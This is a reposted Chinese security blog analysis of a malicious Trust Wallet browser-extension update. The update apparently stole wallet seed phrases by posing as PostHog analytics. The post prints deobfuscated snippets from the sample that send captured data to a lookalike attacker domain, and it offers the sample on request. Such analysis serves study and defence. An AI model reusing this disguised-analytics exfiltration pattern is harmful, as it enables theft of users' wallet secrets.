【深度复盘】TrustWallet惊魂24小时:当官方插件变成“内鬼”,一行代码如何盗走600万美元?

admin
admin
admin
0
文章
0
评论
2025-12-27 01:50:30 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: TrustWallet浏览器插件v2.68更新中被植入伪装成PostHog的恶意模块4482.js,监听助记词输入并通过伪造的metrics-trustwallet.com域名回传,24小时内窃取超600万美元,暴露Chrome商店审核与供应链签名漏洞,建议立即停用该版本并审查插件来源。 综合评分: 92 文章分类: 恶意软件,漏洞分析,供应链安全,数据安全,WEB安全

cover_image

【深度复盘】Trust Wallet 惊魂24小时:当官方插件变成“内鬼”,一行代码如何盗走600万美元?

原创

Pwn1

漏洞集萃

2025年12月26日 14:11 山东

免责声明 本公众号所发布的文章内容仅供学习与交流使用,禁止用于任何非法用途。

2025年的圣诞节,对于 Trust Wallet 的浏览器插件用户来说,不是礼物,而是一场噩梦。

隐形的刺客:v2.68 更新了什么?

12月24日,平安夜。Trust Wallet 浏览器插件悄悄推送了自动更新,版本号从 v2.67 升级到了 v2.68

在应用商店的更新日志里,一切看起来都很正常。但在代码的深处,攻击者混入了一个并不起眼的文件——4482.js

在 v2.67 版本中,这个文件根本不存在。它是如何绕过 Google Chrome 商店的安全扫描,堂而皇之地进入用户浏览器的?答案在于伪装。

这个文件被设计得极像一个普通的“用户行为分析”模块。在现代软件开发中,收集用户点击数据是常态,安全审核机制往往会对其“网开一面”。

披着“PostHog”皮的狼

我们在拿到 v2.68 的恶意样本后,曾经以为会看到复杂的混淆代码或典型的各类 C2 回连脚本。

但是解包之后的结果让我们大吃一惊:攻击者并没有编写粗糙的恶意脚本,而是引入了一个合法的、业内知名的开源产品分析工具——PostHog

而这,正是本次攻击能绕过 Chrome 商店静态扫描的核心原因:伪装成合法的用户行为分析

在混淆后的模块 73373 中,我们提取到了关键的初始化代码:

可以直接使用 https://api.metrics-trustwallet.com 搜索定位

// 模块 73373:恶意初始化的核心逻辑
bootstrap(S) {
    return c(this, null, function*() {
        // C.Ay 是 PostHog 客户端实例的混淆名称
        this.started || (C.Ay.init("phc_b7MQeJq5OhCBJDKHWLA2c1ubYhbY5L97ZsZ66RGwq6O", {
            api_host: "https://api.metrics-trustwallet.com",
            persistence: "localStorage",
            debug: !0,
            autocapture: !1,
            capture_pageview: !1,
            capture_pageleave: !1,
            person_profiles: "always",
            // ...
        }))
    })
}

代码使用了标准的 phc_ 开头的 API Key(phc_b7MQ...)。在安全审计人员或自动化扫描工具眼中,这看起来完全是一个合法的 PostHog 项目初始化配置。PostHog 本身常用于追踪用户点击、页面停留等数据,出现在钱包应用中合情合理。

一般来说,正常的 PostHog 配置通常指向 app.posthog.com 或者是企业自建的合法域名。 但是在本次的攻击案例当中,api_host 被修改为 https://api.metrics-trustwallet.com

攻击者注册这个域名的时候利用 metrics(指标)和 trustwallet 的组合,极具欺骗性。

毕竟两眼一看【metrics】这不妥妥的收集分析么

数据窃取

同样在模块 73373 中,攻击者还复用了 PostHog 的数据发送逻辑。

// 模块 73373
send({
    event: S,
    props: B
}) {
    if (!this.started) {
        this.eventsQueue.push({
            event: S,
            props: B
        });
        return
    }
    C.Ay.capture(S, B)
}

攻击流程还原推测:

  1. 1. 监听:恶意代码监听用户输入框(特别是助记词导入页面)。
  2. 2. 包装:一旦捕获到助记词,脚本将其封装为一个普通的 event(事件)对象,助记词本身变成了事件的 props(属性)。
  3. 3. 发送:调用 C.Ay.capture(S, B)

是的,就是这样,一行朴实无华的代码 影响无数使用 Trust Wallet 的用户,盗走了价值超过 600W 美刀的资产。

如果各位看官大佬也想要分析 Trust Wallet v2.68 样本的话,可以关注+后台回复【Trust Wallet】即可获取

觉得本文内容对您有启发或帮助? 点个关注➕,获取更多深度分析与前沿资讯!

👉 往期精选

攻防演练中的“降维打击”:逃逸出内网边界的影子资产与SaaS供应链挖掘

【从公开报告到私有神器】:如何通过漏洞报告制作字典

伪造注释状态下的XSS

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:漏洞集萃 Pwn1《【深度复盘】Trust Wallet 惊魂24小时:当官方插件变成“内鬼”,一行代码如何盗走600万美元?》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0